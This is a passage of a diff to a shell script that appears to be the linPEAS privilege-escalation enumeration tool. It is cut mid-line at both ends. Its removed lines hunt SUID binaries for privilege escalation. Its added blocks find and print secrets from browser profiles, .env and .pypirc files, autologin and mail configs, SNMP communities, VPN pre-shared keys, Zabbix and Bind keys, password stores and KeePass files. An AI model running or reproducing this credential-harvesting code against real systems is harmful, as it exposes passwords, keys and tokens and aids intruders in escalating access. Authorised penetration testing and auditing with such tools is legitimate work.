"$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then echo_not_found "unattend.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then echo_not_found "unattended.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then echo_not_found "web*.config"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing Other Interesting Files Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then echo_not_found ".lesshst"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then echo_not_found ".plan"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then echo_not_found ".profile"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then echo_not_found ".recently-used.xbel"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then echo_not_found ".rhosts"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; - - - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Firefox Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" +if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Chrome Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi +if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Autologin Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; +fi + + +#-- SI) S/Key athentication +if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then + print_2title "S/Key authentication" + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi +elif [ "$DEBUG" ]; then echo_not_found +fi +echo "" + +#-- SI) YubiKey athentication +if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then + print_2title "YubiKey authentication" + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SNMP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Pypirc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Postfix Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Ldaprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Env Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Msmtprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_KEEPASS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Keepass Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing FTP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Racoon Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Opera Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Safari Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing InfluxDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Zabbix Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Pre-Shared Keys Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do ls -ld "$f" | sed -${E} "s,\.psk$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Pass Store Directories Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do ls -ld "$f" | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo ""; +fi + + +if [ "$PSTORAGE_BIND" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Bind Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_SEEDDMS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SeedDMS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Ddclient Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_SENTRY" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Sentry Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +fi + + +if [ 